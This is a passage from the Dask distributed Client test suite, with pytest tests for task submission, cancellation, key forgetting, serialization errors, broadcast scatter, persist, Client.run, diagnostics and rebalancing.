    with pytest.raises(OSError, match="connect"):
        Client("127.0.0.1:1234", timeout=0.1)
def test_informative_error_on_cluster_type():
    """Passing a cluster class (not instance) to Client raises a helpful TypeError."""
    with pytest.raises(TypeError) as exc_info:
        Client(LocalCluster)
    assert "Scheduler address must be a string or a Cluster instance" in str(
        exc_info.value
    )
@gen_cluster(client=True)
async def test_long_error(c, s, a, b):
    """Very long remote exception messages and traceback lines are truncated."""
    def bad(x):
        raise ValueError("a" * 100000)
    x = c.submit(bad, 10)
    try:
        await x
    except ValueError as e:
        assert len(str(e)) < 100000
    tb = await x.traceback()
    assert all(
        len(line) < 100000
        for line in concat(traceback.extract_tb(tb))
        if isinstance(line, str)
    )
@gen_cluster(client=True)
async def test_map_on_futures_with_kwargs(c, s, a, b):
    """Keyword arguments are forwarded when mapping/submitting over futures."""
    def f(x, y=10):
        return x + y
    futures = c.map(inc, range(10))
    futures2 = c.map(f, futures, y=20)
    results = await c.gather(futures2)
    assert results == [i + 1 + 20 for i in range(10)]
    future = c.submit(inc, 100)
    future2 = c.submit(f, future, y=200)
    result = await future2
    assert result == 100 + 1 + 200
class BadlySerializedObject:
    """Pickles fine but always fails to unpickle (raises TypeError)."""

    def __getstate__(self):
        # Serialization succeeds with a trivial state.
        return 1

    def __setstate__(self, state):
        # Deserialization always fails.
        raise TypeError("hello!")
class FatallySerializedObject:
    """Pickles fine but terminates the deserializing process on unpickle."""

    def __getstate__(self):
        # Serialization succeeds with a trivial state.
        return 1

    def __setstate__(self, state):
        import sys
        print("This should never have been deserialized, closing")
        sys.exit(0)
@gen_cluster(client=True)
async def test_badly_serialized_input(c, s, a, b):
    """One undeserializable input errors its future without poisoning other tasks."""
    o = BadlySerializedObject()
    future = c.submit(inc, o)
    futures = c.map(inc, range(10))
    L = await c.gather(futures)
    assert list(L) == list(map(inc, range(10)))
    assert future.status == "error"
    with pytest.raises(Exception) as info:
        await future
    assert "hello!" in str(info.value)
@pytest.mark.skip
@gen_test()
async def test_badly_serialized_input_stderr(capsys, c):
    """The deserialization error should eventually appear on stderr."""
    o = BadlySerializedObject()
    future = c.submit(inc, o)
    while True:
        sleep(0.01)
        out, err = capsys.readouterr()
        if "hello!" in err:
            break
    assert future.status == "error"
def test_repr(loop):
    """str/repr/_repr_html_ of a Client show address, thread count, and memory."""
    funcs = [str, repr, lambda x: x._repr_html_()]
    with cluster(nworkers=3, worker_kwargs={"memory_limit": "2 GiB"}) as (s, [a, b, c]):
        with Client(s["address"], loop=loop) as c:
            for func in funcs:
                text = func(c)
                assert c.scheduler.address in text
                assert "threads=3" in text or "Total threads: </strong>" in text
                # 3 workers x 2 GiB
                assert "6.00 GiB" in text
                if "<table" not in text:
                    assert len(text) < 80
        # After close the repr reports the disconnected state
        for func in funcs:
            text = func(c)
            assert "No scheduler connected" in text
@gen_cluster(client=True)
async def test_repr_async(c, s, a, b):
    """_repr_html_ works on an asynchronous client without raising."""
    c._repr_html_()
@gen_cluster(client=True, worker_kwargs={"memory_limit": None})
async def test_repr_no_memory_limit(c, s, a, b):
    """_repr_html_ works when workers have no memory limit configured."""
    c._repr_html_()
@gen_test()
async def test_repr_localcluster():
    """The HTML repr of a LocalCluster client includes the address and is valid XML."""
    cluster = await LocalCluster(
        processes=False, dashboard_address=":0", asynchronous=True
    )
    client = await Client(cluster, asynchronous=True)
    try:
        text = client._repr_html_()
        assert cluster.scheduler.address in text
        assert is_valid_xml(client._repr_html_())
    finally:
        await client.close()
        await cluster.close()
@gen_cluster(client=True)
async def test_forget_simple(c, s, a, b):
    """Releasing keys forgets tasks only once no dependents remain."""
    x = c.submit(inc, 1, retries=2)
    y = c.submit(inc, 2)
    z = c.submit(add, x, y, workers=[a.ip], allow_other_workers=True)
    await wait([x, y, z])
    assert not s.waiting_data.get(x.key)
    assert not s.waiting_data.get(y.key)
    assert set(s.tasks) == {x.key, y.key, z.key}
    # x is still needed by z, so releasing it alone keeps it alive
    s.client_releases_keys(keys=[x.key], client=c.id)
    assert x.key in s.tasks
    s.client_releases_keys(keys=[z.key], client=c.id)
    assert x.key not in s.tasks
    assert z.key not in s.tasks
    assert not s.tasks[y.key].dependents
    s.client_releases_keys(keys=[y.key], client=c.id)
    assert not s.tasks
@gen_cluster(client=True)
async def test_forget_complex(e, s, A, B):
    """Forgetting keys in a diamond-shaped graph respects remaining dependents."""
    a, b, c, d = await e.scatter(list(range(4)))
    ab = e.submit(add, a, b)
    cd = e.submit(add, c, d)
    ac = e.submit(add, a, c)
    acab = e.submit(add, ac, ab)
    await wait([a, b, c, d, ab, ac, cd, acab])
    assert set(s.tasks) == {f.key for f in [ab, ac, cd, acab, a, b, c, d]}
    # ab is still needed by acab, so nothing is forgotten yet
    s.client_releases_keys(keys=[ab.key], client=e.id)
    assert set(s.tasks) == {f.key for f in [ab, ac, cd, acab, a, b, c, d]}
    s.client_releases_keys(keys=[b.key], client=e.id)
    assert set(s.tasks) == {f.key for f in [ac, cd, acab, a, c, d]}
    # Releasing acab lets both acab and ab go
    s.client_releases_keys(keys=[acab.key], client=e.id)
    assert set(s.tasks) == {f.key for f in [ac, cd, a, c, d]}
    assert b.key not in s.tasks
    # Wait for the data itself to leave the workers
    while b.key in A.data or b.key in B.data:
        await asyncio.sleep(0.01)
    s.client_releases_keys(keys=[ac.key], client=e.id)
    assert set(s.tasks) == {f.key for f in [cd, a, c, d]}
@gen_cluster(client=True)
async def test_forget_in_flight(e, s, A, B):
    """Releasing keys while tasks are still executing keeps scheduler state valid."""
    delayed2 = partial(delayed, pure=True)
    a, b, c, d = (delayed2(slowinc)(i) for i in range(4))
    ab = delayed2(slowadd)(a, b, dask_key_name="ab")
    cd = delayed2(slowadd)(c, d, dask_key_name="cd")
    ac = delayed2(slowadd)(a, c, dask_key_name="ac")
    acab = delayed2(slowadd)(ac, ab, dask_key_name="acab")
    x, y = e.compute([ac, acab])
    s.validate_state()
    for i in range(5):
        await asyncio.sleep(0.01)
        s.validate_state()
    # Release y mid-flight; its exclusive dependencies should vanish
    s.client_releases_keys(keys=[y.key], client=e.id)
    s.validate_state()
    for k in [acab.key, ab.key, b.key]:
        assert k not in s.tasks
@gen_cluster(client=True)
async def test_forget_errors(c, s, a, b):
    """Exception records persist while blamed dependents exist, then are forgotten."""
    x = c.submit(div, 1, 0)
    y = c.submit(inc, x)
    z = c.submit(inc, y)
    await wait([y])
    assert x.key in s.exceptions
    assert x.key in s.exceptions_blame
    assert y.key in s.exceptions_blame
    assert z.key in s.exceptions_blame
    s.client_releases_keys(keys=[z.key], client=c.id)
    assert x.key in s.exceptions
    assert x.key in s.exceptions_blame
    assert y.key in s.exceptions_blame
    assert z.key not in s.exceptions_blame
    # y still blames x, so x's exception is retained even after releasing x
    s.client_releases_keys(keys=[x.key], client=c.id)
    assert x.key in s.exceptions
    assert x.key in s.exceptions_blame
    assert y.key in s.exceptions_blame
    assert z.key not in s.exceptions_blame
    # Releasing y removes the last reference to the error
    s.client_releases_keys(keys=[y.key], client=c.id)
    assert x.key not in s.exceptions
    assert x.key not in s.exceptions_blame
    assert y.key not in s.exceptions_blame
    assert z.key not in s.exceptions_blame
def test_repr_sync(c):
    """str/repr of a sync client show the scheduler address and worker/thread counts."""
    s = str(c)
    r = repr(c)
    assert c.scheduler.address in s
    assert c.scheduler.address in r
    assert str(2) in s  # nworkers
    assert "cores" in s or "threads" in s
@gen_cluster(client=True)
async def test_waiting_data(c, s, a, b):
    """After completion, finished keys are absent from scheduler waiting_data."""
    x = c.submit(inc, 1)
    y = c.submit(inc, 2)
    z = c.submit(add, x, y, workers=[a.ip], allow_other_workers=True)
    await wait([x, y, z])
    assert not s.waiting_data.get(x.key)
    assert not s.waiting_data.get(y.key)
@gen_cluster()
async def test_multi_client(s, a, b):
    """Scheduler tracks per-client interest (wants_what/who_wants) and cleans up on close."""
    c = await Client(s.address, asynchronous=True)
    f = await Client(s.address, asynchronous=True)
    assert set(s.client_comms) == {c.id, f.id}
    x = c.submit(inc, 1)
    y = f.submit(inc, 2)
    y2 = c.submit(inc, 2)
    # Identical pure calls share one key across clients
    assert y.key == y2.key
    await wait([x, y])
    assert s.wants_what == {
        c.id: {x.key, y.key},
        f.id: {y.key},
        "fire-and-forget": set(),
    }
    assert s.who_wants == {x.key: {c.id}, y.key: {c.id, f.id}}
    await c.close()
    while c.id in s.wants_what:
        await asyncio.sleep(0.01)
    assert c.id not in s.wants_what
    assert c.id not in s.who_wants[y.key]
    assert x.key not in s.who_wants
    await f.close()
    # With no clients left all tasks should be forgotten
    while s.tasks:
        await asyncio.sleep(0.01)
def long_running_client_connection(address):
    """Helper run in a subprocess: connect, compute once, then hang until killed."""
    with pristine_loop():
        c = Client(address)
        x = c.submit(lambda x: x + 1, 10)
        x.result()
        sleep(100)
@gen_cluster()
async def test_cleanup_after_broken_client_connection(s, a, b):
    """Killing a client process causes the scheduler to release its tasks."""
    proc = mp_context.Process(target=long_running_client_connection, args=(s.address,))
    proc.daemon = True
    proc.start()
    while not s.tasks:
        await asyncio.sleep(0.01)
    proc.terminate()
    while s.tasks:
        await asyncio.sleep(0.01)
@gen_cluster()
async def test_multi_garbage_collection(s, a, b):
    """Data shared between clients survives until every interested client drops it."""
    c = await Client(s.address, asynchronous=True)
    f = await Client(s.address, asynchronous=True)
    x = c.submit(inc, 1)
    y = f.submit(inc, 2)
    y2 = c.submit(inc, 2)
    assert y.key == y2.key
    await wait([x, y])
    # Dropping c's only reference to x removes it everywhere
    x.__del__()
    while x.key in a.data or x.key in b.data:
        await asyncio.sleep(0.01)
    assert s.wants_what == {c.id: {y.key}, f.id: {y.key}, "fire-and-forget": set()}
    assert s.who_wants == {y.key: {c.id, f.id}}
    # Dropping f's reference to y: c still wants it, so the data stays
    y.__del__()
    # Fixed: wait for y.key (not x.key, which f never wanted) to leave f's wants
    while y.key in s.wants_what[f.id]:
        await asyncio.sleep(0.01)
    await asyncio.sleep(0.1)
    assert y.key in a.data or y.key in b.data
    assert s.wants_what == {c.id: {y.key}, f.id: set(), "fire-and-forget": set()}
    assert s.who_wants == {y.key: {c.id}}
    # Dropping the last reference removes the data entirely
    y2.__del__()
    while y.key in a.data or y.key in b.data:
        await asyncio.sleep(0.01)
    assert not any(v for v in s.wants_what.values())
    assert not s.who_wants
    await c.close()
    await f.close()
@gen_cluster(client=True)
async def test__broadcast(c, s, a, b):
    """broadcast=True replicates scattered data to all workers."""
    x, y = await c.scatter([1, 2], broadcast=True)
    assert a.data == b.data == {x.key: 1, y.key: 2}
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test__broadcast_integer(c, s, *workers):
    """broadcast=N replicates scattered data to exactly N workers."""
    x, y = await c.scatter([1, 2], broadcast=2)
    assert len(s.tasks[x.key].who_has) == 2
    assert len(s.tasks[y.key].who_has) == 2
@gen_cluster(client=True)
async def test__broadcast_dict(c, s, a, b):
    """Dict scatter with broadcast=True places the named keys on all workers."""
    d = await c.scatter({"x": 1}, broadcast=True)
    assert a.data == b.data == {"x": 1}
def test_broadcast(c, s, a, b):
    """Sync broadcast scatter, with and without a workers= target."""
    x, y = c.scatter([1, 2], broadcast=True)
    has_what = sync(c.loop, c.scheduler.has_what)
    assert {k: set(v) for k, v in has_what.items()} == {
        a["address"]: {x.key, y.key},
        b["address"]: {x.key, y.key},
    }
    # broadcast restricted to a single worker only lands there
    [z] = c.scatter([3], broadcast=True, workers=[a["address"]])
    has_what = sync(c.loop, c.scheduler.has_what)
    assert {k: set(v) for k, v in has_what.items()} == {
        a["address"]: {x.key, y.key, z.key},
        b["address"]: {x.key, y.key},
    }
@gen_cluster(client=True)
async def test_proxy(c, s, a, b):
    """The scheduler proxies messages to a worker and relays the reply."""
    msg = await c.scheduler.proxy(msg={"op": "identity"}, worker=a.address)
    assert msg["id"] == a.identity()["id"]
@gen_cluster(client=True)
async def test_cancel(c, s, a, b):
    """Cancelling a future also cancels its dependents and clears scheduler state."""
    x = c.submit(slowinc, 1)
    y = c.submit(slowinc, x)
    while y.key not in s.tasks:
        await asyncio.sleep(0.01)
    await c.cancel([x])
    assert x.cancelled()
    assert "cancel" in str(x)
    s.validate_state()
    while not y.cancelled():
        await asyncio.sleep(0.01)
    assert not s.tasks
    s.validate_state()
@gen_cluster(client=True)
async def test_cancel_tuple_key(c, s, a, b):
    """Futures with tuple keys can be cancelled; awaiting them raises CancelledError."""
    x = c.submit(inc, 1, key=("x", 0, 1))
    await x
    await c.cancel(x)
    with pytest.raises(CancelledError):
        await x
@gen_cluster()
async def test_cancel_multi_client(s, a, b):
    """Cancelling a shared key from one client leaves the other client's future alive."""
    c = await Client(s.address, asynchronous=True)
    f = await Client(s.address, asynchronous=True)
    x = c.submit(slowinc, 1)
    y = f.submit(slowinc, 1)
    assert x.key == y.key
    await c.cancel([x])
    assert x.cancelled()
    assert not y.cancelled()
    while y.key not in s.tasks:
        await asyncio.sleep(0.01)
    out = await y
    assert out == 2
    with pytest.raises(CancelledError):
        await x
    await c.close()
    await f.close()
@gen_cluster(client=True)
async def test_cancel_collection(c, s, a, b):
    """Cancelling a dask collection cancels its underlying futures."""
    L = c.map(double, [[1], [2], [3]])
    x = db.Bag({("b", i): f for i, f in enumerate(L)}, "b", 3)
    await c.cancel(x)
    # Cancelling again (wrapped in a list) is a no-op, not an error
    await c.cancel([x])
    assert all(f.cancelled() for f in L)
    while s.tasks:
        await asyncio.sleep(0.01)
def test_cancel_sync(c):
    """Sync cancel: dependents are cancelled, independents finish, Future.cancel works."""
    x = c.submit(slowinc, 1, key="x")
    y = c.submit(slowinc, x, key="y")
    z = c.submit(slowinc, y, key="z")
    c.cancel([y])
    start = time()
    # z depends on y so it should become cancelled too
    while not z.cancelled():
        sleep(0.01)
        assert time() < start + 30
    assert x.result() == 2
    z.cancel()
    assert z.cancelled()
@gen_cluster(client=True)
async def test_future_type(c, s, a, b):
    """A finished future knows the type of its result and reflects it in str()."""
    x = c.submit(inc, 1)
    await wait([x])
    assert x.type == int
    assert "int" in str(x)
@gen_cluster(client=True)
async def test_traceback_clean(c, s, a, b):
    """Remote tracebacks are scrubbed of scheduler/worker internal frames."""
    x = c.submit(div, 1, 0)
    try:
        await x
    except Exception as e:
        f = e
        exc_type, exc_value, tb = sys.exc_info()
        while tb:
            assert "scheduler" not in tb.tb_frame.f_code.co_filename
            assert "worker" not in tb.tb_frame.f_code.co_filename
            tb = tb.tb_next
@gen_cluster(client=True)
async def test_map_differnet_lengths(c, s, a, b):
    """Client.map over unequal-length iterables truncates to the shortest.

    NOTE(review): "differnet" in the test name is a typo for "different";
    left as-is to preserve the test id.
    """
    assert len(c.map(add, [1, 2], [1, 2, 3])) == 2
def test_Future_exception_sync_2(loop, capsys):
    """Entering a Client sets it as dask's scheduler, and exiting restores it quietly."""
    with cluster() as (s, [a, b]):
        with Client(s["address"], loop=loop) as c:
            assert dask.base.get_scheduler() == c.get
    out, err = capsys.readouterr()
    # Only a single line of output is expected on teardown
    assert len(out.strip().split("\n")) == 1
    assert dask.base.get_scheduler() != c.get
@gen_cluster(timeout=60, client=True)
async def test_async_persist(c, s, a, b):
    """Client.persist returns like-typed collections backed by futures with the same keys."""
    from dask.delayed import Delayed, delayed
    x = delayed(1)
    y = delayed(inc)(x)
    z = delayed(dec)(x)
    w = delayed(add)(y, z)
    yy, ww = c.persist([y, w])
    assert type(yy) == type(y)
    assert type(ww) == type(w)
    # Persisted graphs collapse to single future entries
    assert len(yy.dask) == 1
    assert len(ww.dask) == 1
    assert len(w.dask) > 1
    assert y.__dask_keys__() == yy.__dask_keys__()
    assert w.__dask_keys__() == ww.__dask_keys__()
    while y.key not in s.tasks and w.key not in s.tasks:
        await asyncio.sleep(0.01)
    assert s.who_wants[y.key] == {c.id}
    assert s.who_wants[w.key] == {c.id}
    yyf, wwf = c.compute([yy, ww])
    yyy, www = await c.gather([yyf, wwf])
    assert yyy == inc(1)
    assert www == add(inc(1), dec(1))
    # Scalar input -> Delayed; list input -> list/tuple
    assert isinstance(c.persist(y), Delayed)
    assert isinstance(c.persist([y]), (list, tuple))
@gen_cluster(client=True)
async def test__persist(c, s, a, b):
    """Persisting a dask array reduces its graph to futures with identical keys/results."""
    pytest.importorskip("dask.array")
    import dask.array as da
    x = da.ones((10, 10), chunks=(5, 10))
    y = 2 * (x + 1)
    assert len(y.dask) == 6
    yy = c.persist(y)
    # Original graph untouched; persisted graph holds one future per chunk
    assert len(y.dask) == 6
    assert len(yy.dask) == 2
    assert all(isinstance(v, Future) for v in yy.dask.values())
    assert yy.__dask_keys__() == y.__dask_keys__()
    g, h = c.compute([y, yy])
    gg, hh = await c.gather([g, h])
    assert (gg == hh).all()
def test_persist(c):
    """Sync variant: persisted dask array computes the same values as the original."""
    pytest.importorskip("dask.array")
    import dask.array as da
    x = da.ones((10, 10), chunks=(5, 10))
    y = 2 * (x + 1)
    assert len(y.dask) == 6
    yy = c.persist(y)
    assert len(y.dask) == 6
    assert len(yy.dask) == 2
    assert all(isinstance(v, Future) for v in yy.dask.values())
    assert yy.__dask_keys__() == y.__dask_keys__()
    zz = yy.compute()
    z = y.compute()
    assert (zz == z).all()
@gen_cluster(timeout=60, client=True)
async def test_long_traceback(c, s, a, b):
    """Deeply recursive failures yield bounded, picklable tracebacks."""
    from distributed.protocol.pickle import dumps
    def deep(n):
        if n == 0:
            1 / 0
        else:
            return deep(n - 1)
    x = c.submit(deep, 200)
    await wait([x])
    assert len(dumps(c.futures[x.key].traceback)) < 10000
    assert isinstance(c.futures[x.key].exception, ZeroDivisionError)
@gen_cluster(client=True)
async def test_wait_on_collections(c, s, a, b):
    """wait() accepts a dask collection and waits for all underlying futures."""
    L = c.map(double, [[1], [2], [3]])
    x = db.Bag({("b", i): f for i, f in enumerate(L)}, "b", 3)
    await wait(x)
    assert all(f.key in a.data or f.key in b.data for f in L)
@gen_cluster(client=True)
async def test_futures_of_get(c, s, a, b):
    """futures_of extracts futures from scalars, nesting, dicts, bags, and SubgraphCallables."""
    x, y, z = c.map(inc, [1, 2, 3])
    assert set(futures_of(0)) == set()
    assert set(futures_of(x)) == {x}
    assert set(futures_of([x, y, z])) == {x, y, z}
    assert set(futures_of([x, [y], [[z]]])) == {x, y, z}
    assert set(futures_of({"x": x, "y": [y]})) == {x, y}
    b = db.Bag({("b", i): f for i, f in enumerate([x, y, z])}, "b", 3)
    assert set(futures_of(b)) == {x, y, z}
    sg = SubgraphCallable(
        {"x": x, "y": y, "z": z, "out": (add, (add, (add, x, y), z), "in")},
        "out",
        ("in",),
    )
    assert set(futures_of(sg)) == {x, y, z}
def test_futures_of_class():
    """futures_of ignores classes (as opposed to instances)."""
    da = pytest.importorskip("dask.array")
    assert futures_of([da.Array]) == []
@gen_cluster(client=True)
async def test_futures_of_cancelled_raises(c, s, a, b):
    """Using a cancelled future anywhere (await, get, submit, map) raises CancelledError."""
    x = c.submit(inc, 1)
    await c.cancel([x])
    with pytest.raises(CancelledError):
        await x
    with pytest.raises(CancelledError):
        await c.get({"x": (inc, x), "y": (inc, 2)}, ["x", "y"], sync=False)
    with pytest.raises(CancelledError):
        c.submit(inc, x)
    with pytest.raises(CancelledError):
        c.submit(add, 1, y=x)
    with pytest.raises(CancelledError):
        c.map(add, [1], y=x)
    assert "y" not in s.tasks
@pytest.mark.skip
@gen_cluster(nthreads=[("127.0.0.1", 1)], client=True)
async def test_dont_delete_recomputed_results(c, s, w):
    """A recomputed result is not deleted by stale cleanup of the forgotten original."""
    x = c.submit(inc, 1)  # compute first time
    await wait([x])
    x.__del__()  # trigger garbage collection
    await asyncio.sleep(0)
    xx = c.submit(inc, 1)  # compute second time
    start = time()
    while xx.key not in w.data:  # data shows up
        await asyncio.sleep(0.01)
        assert time() < start + 1
    while time() < start + (s.delete_interval + 100) / 1000:  # and stays
        assert xx.key in w.data
        await asyncio.sleep(0.01)
@gen_cluster(nthreads=[], client=True)
async def test_fatally_serialized_input(c, s):
    """A fatally-unserializable input still registers a task on the scheduler."""
    o = FatallySerializedObject()
    future = c.submit(inc, o)
    while not s.tasks:
        await asyncio.sleep(0.01)
@pytest.mark.skip(reason="Use fast random selection now")
@gen_cluster(client=True)
async def test_balance_tasks_by_stacks(c, s, a, b):
    """Two sequential tasks should be placed on different workers."""
    x = c.submit(inc, 1)
    await wait(x)
    y = c.submit(inc, 2)
    await wait(y)
    assert len(a.data) == len(b.data) == 1
@gen_cluster(client=True)
async def test_run(c, s, a, b):
    """Client.run executes a function on all, some, or no workers."""
    results = await c.run(inc, 1)
    assert results == {a.address: 2, b.address: 2}
    results = await c.run(inc, 1, workers=[a.address])
    assert results == {a.address: 2}
    results = await c.run(inc, 1, workers=[])
    assert results == {}
@gen_cluster(client=True)
async def test_run_handles_picklable_data(c, s, a, b):
    """run/run_on_scheduler round-trip assorted picklable return values."""
    futures = c.map(inc, range(10))
    await wait(futures)
    def func():
        return {}, set(), [], (), 1, "hello", b"100"
    results = await c.run_on_scheduler(func)
    assert results == func()
    results = await c.run(func)
    assert results == {w.address: func() for w in [a, b]}
def test_run_sync(c, s, a, b):
    """Synchronous Client.run returns {worker address: result}, honoring
    keyword arguments and the ``workers=`` restriction."""

    def func(x, y=10):
        return x + y

    everywhere = {a["address"]: 3, b["address"]: 3}
    assert c.run(func, 1, y=2) == everywhere

    only_a = {a["address"]: 3}
    assert c.run(func, 1, y=2, workers=[a["address"]]) == only_a
@gen_cluster(client=True)
async def test_run_coroutine(c, s, a, b):
    """Client.run awaits coroutine functions on workers and re-raises any
    exception they produce in the caller."""
    results = await c.run(geninc, 1, delay=0.05)
    assert results == {a.address: 2, b.address: 2}
    results = await c.run(geninc, 1, delay=0.05, workers=[a.address])
    assert results == {a.address: 2}
    results = await c.run(geninc, 1, workers=[])
    assert results == {}
    with pytest.raises(RuntimeError, match="hello"):
        await c.run(throws, 1)
    results = await c.run(asyncinc, 2, delay=0.01)
    assert results == {a.address: 3, b.address: 3}
def test_run_coroutine_sync(c, s, a, b):
    """Synchronous Client.run on a coroutine function; with ``wait=False`` it
    returns None immediately instead of blocking on the coroutine."""
    result = c.run(geninc, 2, delay=0.01)
    assert result == {a["address"]: 3, b["address"]: 3}
    result = c.run(geninc, 2, workers=[a["address"]])
    assert result == {a["address"]: 3}
    t1 = time()
    result = c.run(geninc, 2, delay=10, wait=False)
    t2 = time()
    assert result is None
    # fire-and-forget call must return well before the 10s delay elapses
    assert t2 - t1 <= 1.0
@gen_cluster(client=True)
async def test_run_coroutine_deprecated(c, s, a, b):
    """Client.run_coroutine still works but warns, pointing users at Client.run."""
    async def foo():
        return "bar"
    with pytest.warns(FutureWarning, match="Client.run "):
        results = await c.run_coroutine(foo)
    assert results == {a.address: "bar", b.address: "bar"}
def test_run_exception(c):
    """Exceptions raised by a function passed to Client.run surface to the
    caller with their original type and message."""

    def _raiser(kind, message):
        raise kind(message)

    for kind in (ValueError, RuntimeError):
        with pytest.raises(kind, match="informative message"):
            c.run(_raiser, kind, "informative message")
def test_diagnostic_ui(loop):
    """Diagnostic queries (nthreads, who_has, has_what) accept no argument,
    a list of addresses/futures, or a single address/future."""
    with cluster() as (s, [a, b]):
        a_addr = a["address"]
        b_addr = b["address"]
        with Client(s["address"], loop=loop) as c:
            d = c.nthreads()
            assert d == {a_addr: 1, b_addr: 1}
            d = c.nthreads([a_addr])
            assert d == {a_addr: 1}
            d = c.nthreads(a_addr)
            assert d == {a_addr: 1}
            d = c.nthreads(a["address"])
            assert d == {a_addr: 1}
            x = c.submit(inc, 1)
            y = c.submit(inc, 2)
            z = c.submit(inc, 3)
            wait([x, y, z])
            d = c.who_has()
            assert set(d) == {x.key, y.key, z.key}
            assert all(w in [a_addr, b_addr] for v in d.values() for w in v)
            assert all(d.values())
            d = c.who_has([x, y])
            assert set(d) == {x.key, y.key}
            d = c.who_has(x)
            assert set(d) == {x.key}
            d = c.has_what()
            assert set(d) == {a_addr, b_addr}
            assert all(k in [x.key, y.key, z.key] for v in d.values() for k in v)
            d = c.has_what([a_addr])
            assert set(d) == {a_addr}
            d = c.has_what(a_addr)
            assert set(d) == {a_addr}
def test_diagnostic_nbytes_sync(c):
    """Client.nbytes reports per-key byte sizes by default, and per-prefix
    totals when ``summary=True``."""
    incs = c.map(inc, [1, 2, 3])
    doubles = c.map(double, [1, 2, 3])
    futures = incs + doubles
    wait(futures)
    per_key = {f.key: sizeof(1) for f in futures}
    assert c.nbytes(summary=False) == per_key
    per_prefix = {"inc": sizeof(1) * 3, "double": sizeof(1) * 3}
    assert c.nbytes(summary=True) == per_prefix
@gen_cluster(client=True)
async def test_diagnostic_nbytes(c, s, a, b):
    """Scheduler.get_nbytes mirrors Client.nbytes: per-key sizes by default,
    per-prefix totals with ``summary=True``."""
    incs = c.map(inc, [1, 2, 3])
    doubles = c.map(double, [1, 2, 3])
    await wait(incs + doubles)
    assert s.get_nbytes(summary=False) == {k.key: sizeof(1) for k in incs + doubles}
    assert s.get_nbytes(summary=True) == {"inc": sizeof(1) * 3, "double": sizeof(1) * 3}
@gen_cluster(client=True, nthreads=[])
async def test_worker_aliases(c, s):
    """Workers can be addressed by their ``name`` (string or int) in
    ``workers=`` restrictions for map/scatter/submit."""
    a = Worker(s.address, name="alice")
    b = Worker(s.address, name="bob")
    w = Worker(s.address, name=3)
    await asyncio.gather(a, b, w)
    L = c.map(inc, range(10), workers="alice")
    future = await c.scatter(123, workers=3)
    await wait(L)
    assert len(a.data) == 10
    assert len(b.data) == 0
    assert dict(w.data) == {future.key: 123}
    # aliases may be given as a scalar, a list, or a string name
    for i, alias in enumerate([3, [3], "alice"]):
        result = await c.submit(lambda x: x + 1, i, workers=alias)
        assert result == i + 1
    await asyncio.gather(a.close(), b.close(), w.close())
def test_persist_get_sync(c):
    """A delayed graph built on top of persisted intermediates computes to
    the correct value through the synchronous API."""
    x, y = delayed(1), delayed(2)
    xx = delayed(add)(x, x)
    yy = delayed(add)(y, y)
    xxyy = delayed(add)(xx, yy)
    xxyy2 = c.persist(xxyy)
    xxyy3 = delayed(add)(xxyy2, 10)
    assert xxyy3.compute() == ((1 + 1) + (2 + 2)) + 10
@gen_cluster(client=True)
async def test_persist_get(c, s, a, b):
    """Graphs layered on persisted collections compute correctly via both
    Client.get and repeated Client.compute calls."""
    x, y = delayed(1), delayed(2)
    xx = delayed(add)(x, x)
    yy = delayed(add)(y, y)
    xxyy = delayed(add)(xx, yy)
    xxyy2 = c.persist(xxyy)
    xxyy3 = delayed(add)(xxyy2, 10)
    await asyncio.sleep(0.5)
    result = await c.gather(c.get(xxyy3.dask, xxyy3.__dask_keys__(), sync=False))
    assert result[0] == ((1 + 1) + (2 + 2)) + 10
    # repeated compute of the same graph must keep producing the same answer
    result = await c.compute(xxyy3)
    assert result == ((1 + 1) + (2 + 2)) + 10
    result = await c.compute(xxyy3)
    assert result == ((1 + 1) + (2 + 2)) + 10
    result = await c.compute(xxyy3)
    assert result == ((1 + 1) + (2 + 2)) + 10
@pytest.mark.skipif(WINDOWS, reason="num_fds not supported on windows")
def test_client_num_fds(loop):
    """Opening and closing extra clients must not leak file descriptors."""
    with cluster() as (s, [a, b]):
        proc = psutil.Process()
        with Client(s["address"], loop=loop) as c:  # first client to start loop
            before = proc.num_fds()  # measure
            for i in range(4):
                with Client(s["address"], loop=loop):  # start more clients
                    pass
            start = time()
            # wait for the fd count to drop back to the baseline
            while proc.num_fds() > before:
                sleep(0.01)
                assert time() < start + 10, (before, proc.num_fds())
@gen_cluster()
async def test_startup_close_startup(s, a, b):
    """A second client can connect to the same scheduler after the first
    client has been closed."""
    c = await Client(s.address, asynchronous=True)
    await c.close()
    c = await Client(s.address, asynchronous=True)
    await c.close()
def test_startup_close_startup_sync(loop):
    """Synchronous clients can be created and closed repeatedly, including
    nested inside another client's context."""
    with cluster() as (s, [a, b]):
        with Client(s["address"], loop=loop) as c:
            sleep(0.1)
        # NOTE: these inner clients intentionally reuse the name `c` and run
        # on their own loops (no loop= passed)
        with Client(s["address"]) as c:
            pass
        with Client(s["address"]) as c:
            pass
        sleep(0.1)
        with Client(s["address"]) as c:
            pass
@gen_cluster(client=True)
async def test_badly_serialized_exceptions(c, s, a, b):
    """An exception whose __reduce__ itself raises must still propagate to
    the client with its original message visible."""
    def f():
        class BadlySerializedException(Exception):
            def __reduce__(self):
                raise TypeError()
        raise BadlySerializedException("hello world")
    x = c.submit(f)
    with pytest.raises(Exception, match="hello world"):
        await x
@gen_cluster(
    client=True,
    Worker=Nanny,
    worker_kwargs={"memory_limit": "1 GiB"},
    config={"distributed.worker.memory.rebalance.sender-min": 0.3},
)
async def test_rebalance(c, s, *_):
    """Test Client.rebalance(). These are just to test the Client wrapper around
    Scheduler.rebalance(); for more thorough tests on the latter see test_scheduler.py.
    """
    # We used nannies to have separate processes for each worker
    a, b = s.workers
    # Generate 10 buffers worth 512 MiB total on worker a. This sends its memory
    # utilisation slightly above 50% (after counting unmanaged) which is above the
    # distributed.worker.memory.rebalance.sender-min threshold.
    futures = c.map(lambda _: "x" * (2 ** 29 // 10), range(10), workers=[a])
    await wait(futures)
    # Wait for heartbeats
    while s.memory.process < 2 ** 29:
        await asyncio.sleep(0.1)
    assert await c.run(lambda dask_worker: len(dask_worker.data)) == {a: 10, b: 0}
    await c.rebalance()
    ndata = await c.run(lambda dask_worker: len(dask_worker.data))
    # Allow for some uncertainty as the unmanaged memory is not stable
    assert sum(ndata.values()) == 10
    assert 3 <= ndata[a] <= 7
    assert 3 <= ndata[b] <= 7
@gen_cluster(
    nthreads=[("127.0.0.1", 1)] * 3,
    client=True,
    Worker=Nanny,
    worker_kwargs={"memory_limit": "1 GiB"},
)
async def test_rebalance_workers_and_keys(client, s, *_):
    """Test Client.rebalance(). These are just to test the Client wrapper around
